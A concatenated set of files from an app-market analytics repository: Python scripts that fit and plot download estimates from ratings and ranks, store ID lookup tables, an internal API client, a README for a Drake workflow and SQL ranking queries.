p1, = ax.plot(g['orig_rel_error'], y_values, 'b-', linewidth=2.0, alpha=0.4, label='Original SBE')
g = g.sort('new_rel_error_1', ascending=True)
p2, = ax.plot(g['new_rel_error_1'], y_values, 'g-', linewidth=2.0, alpha=0.4, label='est-actual')
g = g.sort('new_rel_error_2', ascending=True)
p2, = ax.plot(g['new_rel_error_2'], y_values, 'c-', linewidth=2.0, alpha=0.4, label='log(est^2/actual^2)*weight')
g = g.sort('new_rel_error_3', ascending=True)
p3, = ax.plot(g['new_rel_error_3'], y_values, 'm-', linewidth=2.0, alpha=0.4, label='log(est^2/actual^2)')
g = g.sort('new_rel_error_4', ascending=True)
p3, = ax.plot(g['new_rel_error_4'], y_values, 'y-', linewidth=2.0, alpha=0.4, label='log(est^2/actual^2)/rank')
g = g.sort('new_rel_error_5', ascending=True)
p3, = ax.plot(g['new_rel_error_5'], y_values, 'k-', linewidth=2.0, alpha=0.4, label='log(est^2/actual^2)/(rank*actual)')
ax.legend(loc='best', prop={'size':10})
title = '80-20_%s'%str(n)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('%')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('plots/new_model/%s.png'%title)
def plot_ranks(df):
########### Plor actuals VS Estimates ################
for n,g in df.groupby(['Country', 'Category', 'Market', 'Type', 'Date']):
fig = plt.figure()
ax = fig.add_subplot(111)
p2, = ax.plot(g['Rank'], g['Estimate'], 'b.', alpha=0.4, label='Original SBE')
p3, = ax.plot(g['Rank'], g['new_estimate_1'], 'g.', alpha=0.4, label='est-actual')
p3, = ax.plot(g['Rank'], g['new_estimate_2'], 'c.', alpha=0.4, label='log(est^2/actual^2)*weight')
p3, = ax.plot(g['Rank'], g['new_estimate_3'], 'm.', alpha=0.4, label='log(est^2/actual^2)')
p3, = ax.plot(g['Rank'], g['new_estimate_4'], 'y.', alpha=0.4, label='log(est^2/actual^2)/rank')
p3, = ax.plot(g['Rank'], g['new_estimate_5'], 'k.', alpha=0.4, label='log(est^2/actual^2)/(rank*actual)')
p1, = ax.plot(g['Rank'][g['SS-APP Universal-S']==False], g['Adjusted Actual'][g['SS-APP Universal-S']==False], 'r.', label='Non-universal Actual')
ax.legend(loc='best', prop={'size':10})
title = 'ranks_%s'%str(n)
plt.title(title)
plt.xlabel('Rank')
plt.ylabel('Estimate')
ax.set_yscale('log')
ax.set_xscale('log')
plt.grid()
fig.savefig('plots/new_model/%s.png'%title)
def get_errors(df):
df = df.groupby(['Country', 'Category', 'Type', 'App ID', 'Date']).sum().reset_index()
df['orig_rel_error'] = (df['Estimate'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['new_rel_error_1'] = (df['new_estimate_1'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['new_rel_error_2'] = (df['new_estimate_2'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['new_rel_error_3'] = (df['new_estimate_3'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['new_rel_error_4'] = (df['new_estimate_4'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
df['new_rel_error_5'] = (df['new_estimate_5'] - df['Adjusted Actual']).abs()/df['Adjusted Actual']
return df
def analyze_ratings(df):
def fitfunc1(p, x):
r = (x[:,0]*p[0] +
x[:,1]*p[1] +
x[:,2]*p[2] +
x[:,3]*p[3] +
x[:,4]*p[4] +
x[:,5]*p[5] +
x[:,6]*p[6] +
x[:,7]*p[7] +
x[:,8]*p[8] +
x[:,9]*p[9] +
x[:,10]*p[10] +
x[:,11]*p[11] +
x[:,12]*p[12] +
x[:,13]*p[13] +
x[:,14]*p[14] +
x[:,15]*p[15] +
x[:,16]*p[16]
)
return r
def errfunc1(p, x, y):
r = fitfunc1(p, x) - y
return r
df.sort(['Country', 'Category', 'Type', 'Market', 'Date'], inplace=True)
df.drop_duplicates(cols=['Country', 'Type', 'App ID', 'Date'], inplace=True)
df['SS-5 Star Ratings Previous Week All Version-S'] = df['SS-5 Star Ratings Previous Week All Version-S'].fillna(0.0)
df['SS-4 Star Ratings Previous Week All Version-S'] = df['SS-4 Star Ratings Previous Week All Version-S'].fillna(0.0)
df['SS-3 Star Ratings Previous Week All Version-S'] = df['SS-3 Star Ratings Previous Week All Version-S'].fillna(0.0)
df['SS-2 Star Ratings Previous Week All Version-S'] = df['SS-2 Star Ratings Previous Week All Version-S'].fillna(0.0)
df['SS-1 Star Ratings Previous Week All Version-S'] = df['SS-1 Star Ratings Previous Week All Version-S'].fillna(0.0)
df['Delta-SS-5 Star Ratings Previous Week All Version-S'] = (df['SS-5 Star Ratings Previous Week All Version-S'].shift() - df['SS-5 Star Ratings Previous Week All Version-S'])*1.0/df['SS-5 Star Ratings Previous Week All Version-S']
df['Delta-SS-4 Star Ratings Previous Week All Version-S'] = (df['SS-4 Star Ratings Previous Week All Version-S'].shift() - df['SS-4 Star Ratings Previous Week All Version-S'])*1.0/df['SS-4 Star Ratings Previous Week All Version-S']
df['Delta-SS-3 Star Ratings Previous Week All Version-S'] = (df['SS-3 Star Ratings Previous Week All Version-S'].shift() - df['SS-3 Star Ratings Previous Week All Version-S'])*1.0/df['SS-3 Star Ratings Previous Week All Version-S']
df['Delta-SS-2 Star Ratings Previous Week All Version-S'] = (df['SS-2 Star Ratings Previous Week All Version-S'].shift() - df['SS-2 Star Ratings Previous Week All Version-S'])*1.0/df['SS-2 Star Ratings Previous Week All Version-S']
df['Delta-SS-1 Star Ratings Previous Week All Version-S'] = (df['SS-1 Star Ratings Previous Week All Version-S'].shift() - df['SS-1 Star Ratings Previous Week All Version-S'])*1.0/df['SS-1 Star Ratings Previous Week All Version-S']
df['%-SS-5 Star Ratings Previous Week All Version-S'] = df['SS-5 Star Ratings Previous Week All Version-S'] / df['SS-APP Ratings Prv Week All Version-S']
df['%-SS-4 Star Ratings Previous Week All Version-S'] = df['SS-4 Star Ratings Previous Week All Version-S'] / df['SS-APP Ratings Prv Week All Version-S']
df['%-SS-3 Star Ratings Previous Week All Version-S'] = df['SS-3 Star Ratings Previous Week All Version-S'] / df['SS-APP Ratings Prv Week All Version-S']
df['%-SS-2 Star Ratings Previous Week All Version-S'] = df['SS-2 Star Ratings Previous Week All Version-S'] / df['SS-APP Ratings Prv Week All Version-S']
df['%-SS-1 Star Ratings Previous Week All Version-S'] = df['SS-1 Star Ratings Previous Week All Version-S'] / df['SS-APP Ratings Prv Week All Version-S']
df['SS-5 Star Ratings Previous Week Prev Version-S'] = df['SS-5 Star Ratings Previous Week All Version-S'] - df['SS-5 Star Ratings Previous Week Cur Version-S']
df['SS-4 Star Ratings Previous Week Prev Version-S'] = df['SS-4 Star Ratings Previous Week All Version-S'] - df['SS-4 Star Ratings Previous Week Cur Version-S']
df['SS-3 Star Ratings Previous Week Prev Version-S'] = df['SS-3 Star Ratings Previous Week All Version-S'] - df['SS-3 Star Ratings Previous Week Cur Version-S']
df['SS-2 Star Ratings Previous Week Prev Version-S'] = df['SS-2 Star Ratings Previous Week All Version-S'] - df['SS-2 Star Ratings Previous Week Cur Version-S']
df['SS-1 Star Ratings Previous Week Prev Version-S'] = df['SS-1 Star Ratings Previous Week All Version-S'] - df['SS-1 Star Ratings Previous Week Cur Version-S']
df['isSun'] = 0.0
df['isMon'] = 0.0
df['isTue'] = 0.0
df['isWed'] = 0.0
df['isThu'] = 0.0
df['isFri'] = 0.0
df['isSat'] = 0.0
df['isSun'][df['SS-DATE-Week Day']==1] = 1.0
df['isMon'][df['SS-DATE-Week Day']==2] = 1.0
df['isTue'][df['SS-DATE-Week Day']==3] = 1.0
df['isWed'][df['SS-DATE-Week Day']==4] = 1.0
df['isThu'][df['SS-DATE-Week Day']==5] = 1.0
df['isFri'][df['SS-DATE-Week Day']==6] = 1.0
df['isSat'][df['SS-DATE-Week Day']==7] = 1.0
p0 = [1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0]
independent_variables = ['SS-5 Star Ratings Previous Week Prev Version-S',
'SS-4 Star Ratings Previous Week Prev Version-S',
'SS-3 Star Ratings Previous Week Prev Version-S',
'SS-2 Star Ratings Previous Week Prev Version-S',
'SS-1 Star Ratings Previous Week Prev Version-S',
'SS-5 Star Ratings Previous Week Cur Version-S',
'SS-4 Star Ratings Previous Week Cur Version-S',
'SS-3 Star Ratings Previous Week Cur Version-S',
'SS-2 Star Ratings Previous Week Cur Version-S',
'SS-1 Star Ratings Previous Week Cur Version-S',
'isSun',
'isMon',
'isTue',
'isWed',
'isThu',
'isFri',
'isSat',
]
all_variables = list(independent_variables)
all_variables.append('SS AN-APP Actual-S')
print all_variables
df = df[df['Type']=='Free'].reset_index()
kf = KFold(len(df), n_folds=5, indices=True, shuffle=True)
result = []
for tr, te in kf:
train = df.loc[tr]
test = df.loc[te]
#train = df[df['Date']<'2013-08-03']
#test = df[df['Date']=='2013-08-03']
train = train.dropna(subset=all_variables)
test = test.dropna(subset=independent_variables)
#print train[all_variables].describe()
p1, success = optimize.leastsq(errfunc1, p0[:], args=(train[independent_variables].values,
train['SS AN-APP Actual-S'].values))
test['new_estimate_1'] = (fitfunc1(p1, test[independent_variables].values))
print p1
result.append(test)
if False:
#for n, g in df.groupby('App ID'):
fig = plt.figure()
ax = fig.add_subplot(111)
#print df[['Date', 'App ID', 'SS-5 Star Ratings Previous Week All Version-S', 'Delta-SS-5 Star Ratings Previous Week All Version-S']]
#plt.plot(df['SS-APP Avg Rating Alltime Cur Version-S'], np.log(df['SS AN-APP Actual-S']), '.', alpha=0.4, label='Avg')
f = train
plot_y = 'SS AN-APP Actual-S'
plt.plot(f['SS-5 Star Ratings Previous Week Cur Version-S'], f[plot_y], '.', alpha=0.4, label='5 stars')
plt.plot(f['SS-4 Star Ratings Previous Week Cur Version-S'], f[plot_y], '.', alpha=0.4, label='4 stars')
plt.plot(f['SS-3 Star Ratings Previous Week Cur Version-S'], f[plot_y], '.', alpha=0.4, label='3 stars')
plt.plot(f['SS-2 Star Ratings Previous Week Cur Version-S'], f[plot_y], '.', alpha=0.4, label='2 stars')
plt.plot(f['SS-1 Star Ratings Previous Week Cur Version-S'], f[plot_y], '.', alpha=0.4, label='1 star')
#plt.plot(f['SS-APP Ratings Prv Week All Version-S'], f[plot_y], '.', alpha=0.4, label='All Star B')
ax.legend(loc='best', prop={'size':10})
ax.set_yscale('log')
ax.set_xscale('log')
#plt.ylim([0, 20000])
plt.ylabel('Actual')
plt.xlabel('Ratings Count')
plt.show()
#plt.savefig('ratings.png')
result = pd.concat(result)
result['abs_error'] = (result['new_estimate_1'] - result['SS AN-APP Actual-S']).abs()
result['rel_error'] = result['abs_error'] / result['SS AN-APP Actual-S']
result.sort(['Date', 'SS AN-APP Actual-S'], ascending=[1, 0], inplace=True)
result[[
'SS AN-APP Actual-S',
'new_estimate_1',
'rel_error',
'abs_error',
'App ID',
'Date',
'%-SS-5 Star Ratings Previous Week All Version-S',
'%-SS-4 Star Ratings Previous Week All Version-S',
'%-SS-3 Star Ratings Previous Week All Version-S',
'%-SS-2 Star Ratings Previous Week All Version-S',
'%-SS-1 Star Ratings Previous Week All Version-S',
'SS-5 Star Ratings Previous Week All Version-S',
'SS-4 Star Ratings Previous Week All Version-S',
'SS-3 Star Ratings Previous Week All Version-S',
'SS-2 Star Ratings Previous Week All Version-S',
'SS-1 Star Ratings Previous Week All Version-S']].to_csv('test_ratings.csv', index=False)
for n, g in result.groupby('Date'):
g.sort('SS AN-APP Actual-S', ascending=False, inplace=True)
print n, g['rel_error'][:20].mean(), g['rel_error'][21:200].mean(), g['rel_error'][201:10000].mean(), g['abs_error'][:20].mean(), g['abs_error'][21:200].mean(), g['abs_error'][201:10000].mean()
fig = plt.figure()
ax = fig.add_subplot(111)
plot_y = 'SS AN-APP Actual-S'
plt.plot(g[plot_y], g['new_estimate_1'], 'b.', alpha=0.4, label='Prediction')
plt.plot(g[plot_y], g[plot_y], 'r-', alpha=1.0, label='Actual')
ax.legend(loc='best', prop={'size':10})
ax.set_yscale('log')
ax.set_xscale('log')
#plt.ylim([0, 20000])
plt.title(n)
plt.ylabel('Prediction')
plt.xlabel('Actual')
plt.savefig('%s.png'%n)
#plt.show()
return
def main():
df = preprocess_metadata(pd.read_csv(metadata_f))
df = df[df['Date']>='2013-07-28']
df = df[df['Date']<='2013-08-03']
df = df[df['Country']=='United States']
#df = df[df['Rank']>200]
#df = df[df['Type']=='Grossing']
#df = df[df['Category']=='Games']
#df = df[df['SS-APP Universal-S']==False]
print df['Date'].min()
print df['Date'].max()
#df = df[df['Rank']<=20]
analyze_ratings(df)
return
#plt.plot(df['SS-5 Star Ratings Previous Week Cur Version-S'], df['Rank'], 'r.', alpha=0.4)
#plt.show()
#return
#get_clusters(df)
#return
#df = df[(df['Date']=='2013-07-28') | (df['Date']=='2013-08-03')]
algorithm = SVR(kernel='rbf', C=1e3, gamma=0.1)
#algorithm = linear_model.LinearRegression()
df = train_models(df, algorithm)
plot_ranks(df)
df = get_errors(df)
df['Actual'] = df['Adjusted Actual']
#plot_actuals(df)
#plot_80_20(df)
if __name__ == '__main__':
main()<file_sep>/google-analytics/__init__.py
## This is Google Analytics Benchmarking Version v1.0
<file_sep>/old_investigations/internal/stores_dict.py
"""
Translate the number to names.
"""
category_dict = {36: u'Overall', 6000: u'Business', 6001: u'Weather',
6002: u'Utilities', 6003: u'Travel', 6004: u'Sports',
6005: u'Social Networking', 6006: u'Reference', 6007: u'Productivity',
6008: u'Photo and Video', 6009: u'News', 6010: u'Navigation',
6011: u'Music', 6012: u'Lifestyle', 6013: u'Health and Fitness',
6014: u'Games', 6015: u'Finance', 6016: u'Entertainment',
6017: u'Education', 6018: u'Books', 6020: u'Medical',
6021: u'Newsstand', 6022: u'Catalogs', 6023: u'Food and Drink',
7001: u'Action', 7002: u'Adventure', 7003: u'Arcade',
7004: u'Board', 7005: u'Card', 7006: u'Casino',
7007: u'Dice', 7008: u'Educational', 7009: u'Family',
7010: u'Kids', 7011: u'Music', 7012: u'Puzzle',
7013: u'Racing', 7014: u'Role Playing', 7015: u'Simulation',
7016: u'Sports', 7017: u'Strategy', 7018: u'Trivia', 7019: u'Word'}
market_dict = {0: "IPHONE", 1: "IPHONE", 2: "IPHONE",
100: "IPAD", 101: "IPAD", 102: "IPAD"}
type_dict = {0: "FREE", 1: "PAID", 2: "GROSSING",
100: "PAID", 101: "FREE", 102: "GROSSING"}
units_type_dict = {0: "Downloads", 1: "Downloads", 2: "USD",
100: "Downloads", 101: "Downloads", 102: "USD"}
country_dict = {143441: u'United States', 143442: u'France', 143443: u'Germany',
143444: u'United Kingdom', 143445: u'Austria', 143446: u'Belgium',
143447: u'Finland', 143448: u'Greece', 143449: u'Ireland',
143450: u'Italy', 143451: u'Luxembourg', 143452: u'Netherlands',
143453: u'Portugal', 143454: u'Spain', 143455: u'Canada',
143456: u'Sweden', 143457: u'Norway', 143458: u'Denmark',
143459: u'Switzerland', 143460: u'Australia', 143461: u'New Zealand',
143462: u'Japan', 143463: u'Hong Kong', 143464: u'Singapore',
143465: u'China', 143466: u'South Korea', 143467: u'India',
143468: u'Mexico', 143469: u'Russia', 143470: u'Taiwan',
143471: u'Vietnam', 143472: u'South Africa', 143473: u'Malaysia',
143474: u'Philippines', 143475: u'Thailand', 143476: u'Indonesia',
143477: u'Pakistan', 143478: u'Poland', 143479: u'Saudi Arabia',
143480: u'Turkey', 143481: u'United Arab Emirates', 143482: u'Hungary',
143483: u'Chile', 143485: u'Panama', 143486: u'Sri Lanka',
143487: u'Romania', 143489: u'Czech Republic', 143491: u'Israel',
143493: u'Kuwait', 143494: u'Croatia', 143495: u'Costa Rica',
143496: u'Slovakia', 143497: u'Lebanon', 143498: u'Qatar',
143499: u'Slovenia', 143501: u'Colombia', 143502: u'Venezuela',
143503: u'Brazil', 143504: u'Guatemala', 143505: u'Argentina',
143506: u'El Salvador', 143507: u'Peru', 143508: u'Dominican Republic',
143509: u'Ecuador', 143510: u'Honduras', 143511: u'Jamaica',
143512: u'Nicaragua', 143513: u'Paraguay', 143514: u'Uruguay',
143515: u'Macau', 143516: u'Egypt', 143517: u'Kazakhstan',
143518: u'Estonia', 143519: u'Latvia', 143520: u'Lithuania',
143521: u'Malta', 143523: u'Moldova', 143524: u'Armenia',
143525: u'Botswana', 143526: u'Bulgaria', 143528: u'Jordan',
143529: u'Kenya', 143530: u'Macedonia', 143531: u'Madagascar',
143532: u'Mali', 143533: u'Mauritius', 143534: u'Niger',
143535: u'Senegal', 143536: u'Tunisia', 143537: u'Uganda',
143538: u'Anguilla', 143539: u'Bahamas', 143540: u'Antigua and Barbuda',
143541: u'Barbados', 143542: u'Bermuda', 143543: u'British Virgin Islands',
143544: u'Cayman Islands', 143545: u'Dominica', 143546: u'Grenada',
143547: u'Montserrat', 143548: u'St. Kitts and Nevis', 143549: u'St. Lucia',
143550: u'St. Vincent and The Grenadines', 143551: u'Trinidad and Tobago', 143552: u'Turks and Caicos',
143553: u'Guyana', 143554: u'Suriname', 143555: u'Belize',
143556: u'Bolivia', 143557: u'Cyprus', 143558: u'Iceland',
143559: u'Bahrain', 143560: u'Brunei', 143561: u'Nigeria',
143562: u'Oman', 143563: u'Algeria', 143564: u'Angola',
143565: u'Belarus', 143566: u'Uzbekistan', 143568: u'Azerbaijan',
143571: u'Yemen', 143572: u'Tanzania', 143573: u'Ghana',
143575: u'Albania', 143576: u'Benin', 143577: u'Bhutan',
143578: u'Burkina Faso', 143579: u'Cambodia', 143580: u'Cape Verde',
143581: u'Chad', 143582: u'Congo', 143583: u'Fiji',
143584: u'Gambia', 143585: u'Guinea-Bissau', 143586: u'Kyrgyzstan',
143587: u'Laos', 143588: u'Liberia', 143589: u'Malawi',
143590: u'Mauritania', 143591: u'Micronesia', 143592: u'Mongolia',
143593: u'Mozambique', 143594: u'Namibia', 143484: u'Nepal',
143595: u'Palau', 143597: u'Papua New Guinea', 143598: u'Sao Tome and Principe',
143599: u'Seychelles', 143600: u'Sierra Leone', 143601: u'Solomon Islands',
143602: u'Swaziland', 143603: u'Tajikistan', 143604: u'Turkmenistan',
143492: u'Ukraine', 143605: u'Zimbabwe'}
def query_stores_dict(x, t):
return eval("query_%s(x)" % t)
def query_category(x):
return category_dict[int(x)]
def query_market(x):
return market_dict[int(x)]
def query_type(x):
return type_dict[int(x)]
def query_units_type(x):
return units_type_dict[int(x)]
def query_country(x):
return country_dict[int(x)]
def query_date(x):
return x
<file_sep>/evaluation/readme.txt
# Quality Measurement Framework with Drake
Author: <NAME> (<EMAIL>), <NAME> (<EMAIL>)
# Introduction
To measure the quality of a certain estimation, we have to fetch and process the
estimation and real values and compare them. The
[Drake](https://github.com/Factual/drake) is used for managing the dependencies
of the steps. It also helps us to componentize the workflow.
# Prerequisites
## Clojure and Lein
Drake is built with [Clojure](http://clojure.org/), and Clojure is a programming
language targetting the JVM. Besides from JDK, you have to install Clojure and
lein. In Mac, the steps are:
``
brew install clojure
brew upgrade --devel leiningen
``
After these two steps, please follow the steps on
[Drake's homepage](https://github.com/Factual/drake) to finish installing.
## External Script
Currently, we rely on external script to fetch estimation. Because the path of
the script is probably different on different people's machine, the old approach of
changing path in the config file is troublesome.
Now, we recommend symlink the external script to the `external/` folder. The
content of that folder is not tracked, so everybody could keep his own
version. You just need to link things in the first time.
Which script should you symlink? It depends on which estimation fetcher you want
to use. Check `py/internal/est_fetcher.py` to see the corresponding
`script_path` setting for the fetcher.
Examples:
- iOS : `ln -s ~/aa/estimation/ios/gen_daily_app_estimates.py external/est_ios.py`
- Android: `ln -s ~/aa/estimation/android/gen_daily_app_estimates.py external/est_android.py`
<file_sep>/aa_au_model/lib/api.py
import pandas as pd
from StringIO import StringIO
import requests
import datetime
def get_external_ids_from_bundles(bundle_ids, market = 'ios'):
"""
get external app ids for bundle ids
bundle_ids: required data frame with bundle ids
:return: dataframe with external ids and bundle ids
"""
bundle_ext_ids = pd.DataFrame()
os = market
if market == 'android':
os = 'google-play'
for i in range((len(bundle_ids)-1) / 100 + 1):
app_bundles = map(str, bundle_ids.ix[0 + i * 100:99 + i * 100].iloc[:,0].values)
app_bundle_string = ','.join(app_bundles)
api_settings = {'codes': app_bundle_string,
'create_new': 'false',
'vertical': 'apps',
'market': market
}
req = requests.request('POST',
'https://api-internal.appannie.com/internal/v1.1/apps/{}/codes2ids'.format(os),
data=api_settings,
headers={'Authorization': 'bearer 6857259eef54a438<KEY>cab'})
df = pd.read_json(StringIO(req.text))
bundle_ext_ids_i = pd.DataFrame()
for i in range(len(df)):
data = pd.DataFrame.from_dict(df['items'][i], orient='index').T
bundle_ext_ids_i = bundle_ext_ids_i.append(data, ignore_index=True)
bundle_ext_ids_i.columns = ('external_id','bundle_id')
bundle_ext_ids = bundle_ext_ids.append(bundle_ext_ids_i, ignore_index=True)
return bundle_ext_ids
def get_int_data(startdate, enddate, ext_ids, granularity = 'monthly', device='all', country = 'US', feed = 'downloads'):
"""
get int data
ext_ids: required data frame with external app ids
:param startdate:
:param enddate:
:param country: an iso code for 1 country
:param granularity: 'monthly', 'weekly', 'daily'
:param device: 'all' or 'android'
:return: dataframe with external ids and bundle ids
"""
assert 'external_id' in ext_ids.columns and 'bundle_id' in ext_ids.columns, ValueError('Check your ext_ids table have two ids')
os = device
if device == 'android':
os = 'google-play'
elif device == 'all':
os = 'ios'
else:
raise ValueError('Make sure device = \"android\" or \"all\"')
api_settings = {'countries': country,
'feeds': feed,
'device': device,
'granularity': granularity,
'start_date': datetime.datetime.strptime(startdate, '%Y%m%d').strftime('%Y-%m-%d'),
'end_date': datetime.datetime.strptime(enddate, '%Y%m%d').strftime('%Y-%m-%d')
}
int_data = pd.DataFrame()
for app_id in ext_ids['external_id']:
if pd.isnull(app_id) is False:
req_test = requests.request('GET',
'https://api.appannie.com/v1.1/intelligence/apps/{}/app/'.format(os) + str(int(app_id)) + '/history',
params=api_settings,
headers={'Authorization': 'bearer <KEY>'})
df = pd.read_json(StringIO(req_test.text))
app_download_data = pd.DataFrame()
for i in df.list:
data = pd.DataFrame.from_dict(i, orient='index').T
app_download_data = app_download_data.append(data, ignore_index=True)
app_dl_temp = pd.merge(app_download_data, df, left_index=True, right_index=True)
int_data = int_data.append(app_dl_temp, ignore_index=True)
int_data = int_data[int_data.estimate != 'N/A']
int_data = int_data[['device','country','estimate','date','product_id','product_name']]
int_data.columns = ['device','country',api_settings['feeds'],'date','external_id','product_name']
int_data['granularity'] = granularity
return int_data
def get_ios_leaderboards(date, device, feed, country='US', ranks=400, granularity= 'daily'):
"""
Get leaderboards
:param date:
:param device: iphone | ipad | ios | android
:param feed: free | paid | grossing
:param granularity: monthly | weekly | daily
:return: a datetime object
"""
api_settings = {'countries': country,
'categories': 'Overall',
'feeds': feed,
'ranks': ranks,
'granularity': granularity,
'date': date,
'device': device
}
req_test = requests.request('GET',
'https://api.appannie.com/v1.1/intelligence/apps/ios/ranking',
params=api_settings,
headers={'Authorization': 'bearer <KEY>'})
df = pd.read_json(StringIO(req_test.text))
leaderboards = pd.DataFrame()
for i in df.list:
data = pd.DataFrame.from_dict(i, orient='index').T
leaderboards = leaderboards.append(data, ignore_index=True)
leaderboards = leaderboards[['product_id','rank','feed','category','product_category','estimate','product_name']]
leaderboards['country'] = country
leaderboards['device'] = device
leaderboards['date'] = date
leaderboards['granularity'] = granularity
return leaderboards
<file_sep>/old_investigations/internal/monthly_concater.py
"""
For aggregate the raw data that Mark's script provides.
For Mark's script, the parameters and output are:
- Parameters:
-s[store] -f[feed] -d[date]
- Output example:
category_id,rank,app_id,estimate
36,1,432849519,25006
36,2,419396407,23158
36,3,343200656,22141
Mark's script is query on the daily basis, this script will wrap Mark's script
to provide on the monthly basis, and generate file with complete fields and
normalized filename, real units will be added.
"""
#Author: <NAME> <<EMAIL>>
import sys
import os
import os.path
import subprocess
import config
from dateutil import rrule
from dateutil.relativedelta import relativedelta
from datetime import date
import pandas as pd
from joblib import Parallel, delayed
import stores_dict
RAW_ESTIMATION_DIR = "./cache/raw_estimation"
DAILY_SCRIPT_PATH = config.daily_estimate_script_path
REFERENCE_FILE_FORMAT = './cache/references/real_units_%s_%s_%s.csv'
FEEDS = {'Downloads': [0, 1, 100, 101],
'USD': [2, 102]}
def concat_and_save_all_days_and_feeds_in_month(opts, n_jobs=1):
"""
Arguments:
- `opts`:
"""
store = opts.store
year_month = opts.year_month
overwrite = opts.overwrite
year_month_split = year_month.split('-')
year_month_split = map(int, year_month_split)
dtstart = date(year_month_split[0], year_month_split[1], 1)
dtend = dtstart + relativedelta(months=+1) + relativedelta(days=-1)
stacked_df = []
units_type = opts.units_type
# We need to gather all the feeds in order to decide the device of the app.
outfile = './cache/monthly/%s_%s_%s.csv' % (stores_dict.query_country(store), year_month, units_type)
if not overwrite and os.path.exists(outfile):
print('Monthly cache exists. Use cached version. %s' % outfile)
return
# We have to concat every feed in the same units type
for feed in FEEDS[units_type]:
dts = map(lambda x: str(x.date()),
rrule.rrule(rrule.DAILY, dtstart=dtstart, until=dtend))
current_df = Parallel(n_jobs=n_jobs)(delayed(_run_daily_basis_script)(store, feed, dt, overwrite)
for dt in dts)
stacked_df += current_df
stacked_df = pd.concat(stacked_df)
# Add real units to the data
real_units_df = pd.read_csv(REFERENCE_FILE_FORMAT % (opts.store, opts.year_month, units_type))
# Use inner join, because we only care the case where we have estimation and real values.
print('Merging data from all the days in this month...')
merged = pd.merge(stacked_df, real_units_df, on=['app_id', 'date'], how='inner')
# Change the column name from the database.
if units_type == 'USD':
merged.rename(columns={'revenue': 'units'}, inplace=True)
merged.sort_index(by=['date']).to_csv(outfile, index=False)
def _run_daily_basis_script(store, feed, dt, overwrite=False):
"""Run Mark's script with the parameters.
All parameters are `str`.
"""
cmd = "python %s -s %s -f %s -d %s" % (DAILY_SCRIPT_PATH, store, feed, dt)
# Write the csv to a temp file.
csv_filename = os.path.join(RAW_ESTIMATION_DIR, "%s_%s_%s.csv" % (store, feed, dt))
if not overwrite and os.path.exists(csv_filename):
print('Cache exists. Use cached version. %s' % csv_filename)
return pd.read_csv(csv_filename)
try:
print("Running the cmd: %s" % cmd)
child = subprocess.Popen(cmd.split(" "), stdout=subprocess.PIPE)
stdout_value, stderr_value = child.communicate()
ret = child.returncode
print("Ret!!!", ret)
if ret is None or ret >= 2 or (stderr_value is not None and 'Error' in stderr_value):
raise Exception("Have problem fetching daily estimation: %s" % cmd)
with open(csv_filename, 'w') as outfile:
outfile.write(stdout_value)
except Exception as e:
print(e)
if os.path.exists(csv_filename):
os.remove(csv_filename)
sys.exit(2)
# Pass meta-information for refine the csv.
info = {}
info["store_id"] = store
info["feed_id"] = feed
info["date"] = dt
refined_csv = _refine_csv_file(csv_filename, info)
refined_csv.to_csv(csv_filename, index=False)
return refined_csv
def _refine_csv_file(filename, info):
"""Load the csv file, add more fields (make it complete).
"""
df = pd.read_csv(filename)
for k, v in info.iteritems():
df[k] = v
return df
<file_sep>/int-vs-m-benchmark/sql/android/1001b1-market-rankings.sql
/*
DESCRIPTION : collect daily rankings
INPUT TABLE(S) : market.rankings
temp.settings_appstore_instances
temp.settings_rankcategories
temp.settings_exchange_rates
INTERIM TABLE(S) : n/a
OUTPUT TABLE(S) : temp.rankings
QUERY STEPS : Get all rankings for the given date.
/* Find all relevant rankings for the given date
Note that there can be multiple applications for a given (country,
type, category, rank) for Google Play. This is caused by collecting
the ranking data using multiple devices and getting multiple apps for the
same rank. The primary key is therefore on (country, type, category, rank
application) instead of (country, type, category, rank) as is done for
Apple App Store.
Not all countries have all types (free/paid/gross) of rankings;
this requires the join between settings_rankcategories and settings_appstore_instances on type
*/
DROP TEMPORARY TABLE IF EXISTS temp.rankings;
CREATE TEMPORARY TABLE temp.rankings(
date date NOT NULL,
country_id smallint(5) unsigned NOT NULL,
type ENUM('paid','gross','free') NOT NULL,
category_id smallint(5) unsigned NOT NULL,
rank smallint(5) unsigned NOT NULL,
application_id int(10) unsigned NOT NULL,
price_usd decimal(9,2) NOT NULL,
CONSTRAINT PRIMARY KEY (
date,
country_id,
type,
category_id,
rank,
application_id
),
INDEX i (
date,
country_id,
type,
application_id
)
)
AS
SELECT
sai.country_id,
src.type,
src.category_id,
r.rank,
r.application_id,
ROUND(IF(r.price IS NULL, 0, r.price / ser.rate), 2) AS price_usd,
w.date
FROM market.rankings r FORCE INDEX (PRIMARY)
JOIN temp.settings_appstore_instances sai
ON r.appstore_instance_id = sai.appstore_instance_id
JOIN temp.settings_rankcategories src
ON r.rankcategory_id = src.rankcategory_id
AND sai.type = src.type
JOIN
temp.settings_day_weights w
on DATE_ADD(w.date, INTERVAL 2 DAY) = r.date
LEFT JOIN temp.settings_exchange_rates ser
ON r.currency_id = ser.id
;
<file_sep>/aa_au_model/mdm/sql/emr_mdm_all_usage.sql
-- See table definitions in aa-data-science/aa_au_model/hive_ql/HiveQL table from S3.
-- iOS uses mdm_fact_app_days_running, Android uses mdm_fact_app_screen_time
set hive.exec.dynamic.partition.mode = nonstrict;
drop table if exists devices_ios;
create table devices_ios
as
select
s.date as period_date,
s.guid_key,
g.guid,
g.device_platform,
o.iso_country_code,
d.device_type
from
mdm_sample_selected_device_weekly s
join mdm_dim_operator o
on s.operator_key = o.operator_key
join mdm_dim_device d
on s.device_key = d.device_key
join mdm_dim_guid g
on s.guid_key = g.guid_key
where
o.iso_country_code in ('us', 'gb', 'jp' ,'kr')
and s.datestr between '2015-09-13' and '2015-10-31'
and d.device_type != 'unknown'
and g.device_platform = 'ios'
;
drop table if exists mdm_usage_ios;
create table mdm_usage_ios (
date date,
guid_key int,
guid string,
bundle_id string,
device_platform string,
iso_country_code string,
device_type string
)
row format delimited fields terminated by '\t'
